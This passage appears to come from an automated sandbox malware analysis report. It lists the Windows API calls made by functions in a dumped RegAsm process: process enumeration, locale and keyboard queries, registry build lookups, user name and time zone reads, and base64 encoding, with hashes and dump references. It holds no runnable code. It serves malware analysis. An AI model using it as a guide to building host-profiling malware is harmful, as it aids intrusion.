                                                                                                                                                                                                            • Opcode ID: 900c35ab7afcc40e7a7cf5b430d2d5458d1d11d08c7f5bab420e5e77f220ba17
                                                                                                                                                                                                            • Instruction ID: 7abcdadd1047882aeb49e6bc0230b2c49127e92fec4c539b78c5da6f41ef3bb1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 900c35ab7afcc40e7a7cf5b430d2d5458d1d11d08c7f5bab420e5e77f220ba17
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2616DB5500244AFDB20EF61DC45FEE7778AF05704F90412AB919A32C2DF78AA4D8B69
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0040A410 Relevance: 13.8, APIs: 9, Instructions: 329fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,004268F7,00000000,?,00426AF8,?,?,004268F7,?,00000004), ref: 0040A4A1
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426AFC), ref: 0040A4DD
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426B00), ref: 0040A4F7
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00CC1BE8,00000000,?,?,?,00426B04,?,?,004268FA), ref: 0040A58C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2567437900-0
                                                                                                                                                                                                            • Opcode ID: 20c6a2aa23b27b3b7ad4ee61940e25525bb6fb3bb58954450f4b370ff44bcdc2
                                                                                                                                                                                                            • Instruction ID: 6a27621f83369cd6e2f3a123bbd694f50788514ab202d94f0c2408c910f303ee
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20c6a2aa23b27b3b7ad4ee61940e25525bb6fb3bb58954450f4b370ff44bcdc2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4D16E74901348EACB10EBB5C5567DE7BB8AF19344F14817EE805636C1DB785B0CCAE6
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00410250 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,00426ED7,?,?,00000001), ref: 00410297
                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 004102A9
                                                                                                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 004102B4
                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 004102E6
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,00000001), ref: 0041038A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                            • String ID: /
                                                                                                                                                                                                            • API String ID: 507856799-4001269591
                                                                                                                                                                                                            • Opcode ID: 828938db0a0d89c016865929d3d364f952d3f06c7670566c98b4169b2bd766c3
                                                                                                                                                                                                            • Instruction ID: 88cfb92a16e79a938eecc1e6c8ea63f48f4861ab29c6019005c8a27ba16dcd20
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 828938db0a0d89c016865929d3d364f952d3f06c7670566c98b4169b2bd766c3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C315E71900218EBDB10DFD5C889BEEB7B9BB48700F50406EF606B3281D7B85A85CBA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00410080 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00410095
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0041009C
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00CBB2C0,00000000,00020119,?), ref: 004100BB
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004100D5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                            • String ID: CurrentBuildNumber
                                                                                                                                                                                                            • API String ID: 3676486918-1022791448
                                                                                                                                                                                                            • Opcode ID: cc8c66ad68d5aa82d95e0afe04f8ae3b49b5efa3778ac17cb4961148ccf52f5d
                                                                                                                                                                                                            • Instruction ID: 32f32345949c3bfe8ed70cbd65550a94797c7444ebfb09c580b8ca6ce0899944
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc8c66ad68d5aa82d95e0afe04f8ae3b49b5efa3778ac17cb4961148ccf52f5d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CEF062B9551224FBE7109BE0ED0AFAB7B7DDB09B01F001155FB05E6280E6B45A4087B5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 004101E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33memorytimeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004101F1
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004101F8
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?), ref: 00410207
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00410232
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                            • String ID: wwww
                                                                                                                                                                                                            • API String ID: 362916592-671953474
                                                                                                                                                                                                            • Opcode ID: 3044c927dec141a93886957608131eb558622066ad46d4ac3dfd33838b5779d5
                                                                                                                                                                                                            • Instruction ID: c3cf7c56ac02218902dba003d01796f03d970a09a3bb954e2060a2a285436359
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3044c927dec141a93886957608131eb558622066ad46d4ac3dfd33838b5779d5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62F0A775B00224ABE71C6BA89C0EFAA7B1E9B46711F054365FE16CB2D0DA705C1486D5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00410980 Relevance: 7.6, APIs: 5, Instructions: 80processCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004109CF
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 004109DF
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 004109F1
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00410A5E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00410A69
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 562399079-0
                                                                                                                                                                                                            • Opcode ID: bbe15332e3606997c138a37cc090c0ba396d8564c362cfb52ed53cfaca7e1834
                                                                                                                                                                                                            • Instruction ID: 97ef3f6101a671d1b5427541aba143b35ca1827fba5ee7ac895da847b45bd814
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbe15332e3606997c138a37cc090c0ba396d8564c362cfb52ed53cfaca7e1834
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9218271A00218EBCB10DF95DC45BEEB7BCBF48B54F10417EF506A3281DBB85A498BA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00411AB0 Relevance: 7.6, APIs: 5, Instructions: 59processCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411AE9
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 00411AF9
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00411B0B
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,?), ref: 00411B20
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00411B42
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                                                            • Opcode ID: b15d4887e4429494ab3857d6c345d0b68112c5056972e2e93b95cde1091f6752
                                                                                                                                                                                                            • Instruction ID: 6e323a273099ea9ea9791a7093cfb5424019519535bf8d6db1e3032e5cb7a16a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b15d4887e4429494ab3857d6c345d0b68112c5056972e2e93b95cde1091f6752
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0211C176A05518AFC711CF89DC45BDEF7B9FB85710F10429AFA05E3250D7386A40CBA0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00411600 Relevance: 6.1, APIs: 4, Instructions: 63memoryencryptionCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411624
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,00404DDA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00411633
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,00404DDA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041163A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocateBinaryCryptProcessString
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 869800140-0
                                                                                                                                                                                                            • Opcode ID: a5bc244c91944e159526dac87f2701fa0a5e61637d43ef5c594d15196ce9044e
                                                                                                                                                                                                            • Instruction ID: db228fde36600b89e308864814a0fd4187c9bf3bc2b87e83fcb48dcf596a97a1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5bc244c91944e159526dac87f2701fa0a5e61637d43ef5c594d15196ce9044e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA112171640219ABDB10CFA5EC85EEBB7ADFF4A361F10455AFE09D7200D772DC508AA0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 004102C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 004102E6
                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,00000001), ref: 0041038A
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$FreeInfoLocalLocalelstrcatlstrlen
                                                                                                                                                                                                            • String ID: /
                                                                                                                                                                                                            • API String ID: 3280604673-4001269591
                                                                                                                                                                                                            • Opcode ID: 7048e50621e4d5d4819c872da963360d29b9e3b6f0ee254219a64908d19711aa
                                                                                                                                                                                                            • Instruction ID: ce17fd588857d30347beb69bbde86745f8abd7f3fa5c559c97b60cfac1502add
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7048e50621e4d5d4819c872da963360d29b9e3b6f0ee254219a64908d19711aa
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5116371A00158DBCB14DBD4C885BFDB7B9BF58300F14006EF606B3182D7785A85CBA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00410100 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00418382,004271D3), ref: 0041010C
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00418382,004271D3), ref: 00410113
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(00000000,004271D3), ref: 00410127
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1206570057-0
                                                                                                                                                                                                            • Opcode ID: 473499ec4a489346d5b8381035135aa7156d3b2d8f7926a473b752b9a765c721
                                                                                                                                                                                                            • Instruction ID: 19b93291ffa213a11ad41bdc802fd7864df3898d1af9124162a70396b117772a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 473499ec4a489346d5b8381035135aa7156d3b2d8f7926a473b752b9a765c721
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88D012B9551228BBE7009BD49D0DFDA7B6DDB06751F001192FB05D3240D5F0590047E1
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00410420 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InfoSystemwsprintf
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2452939696-0
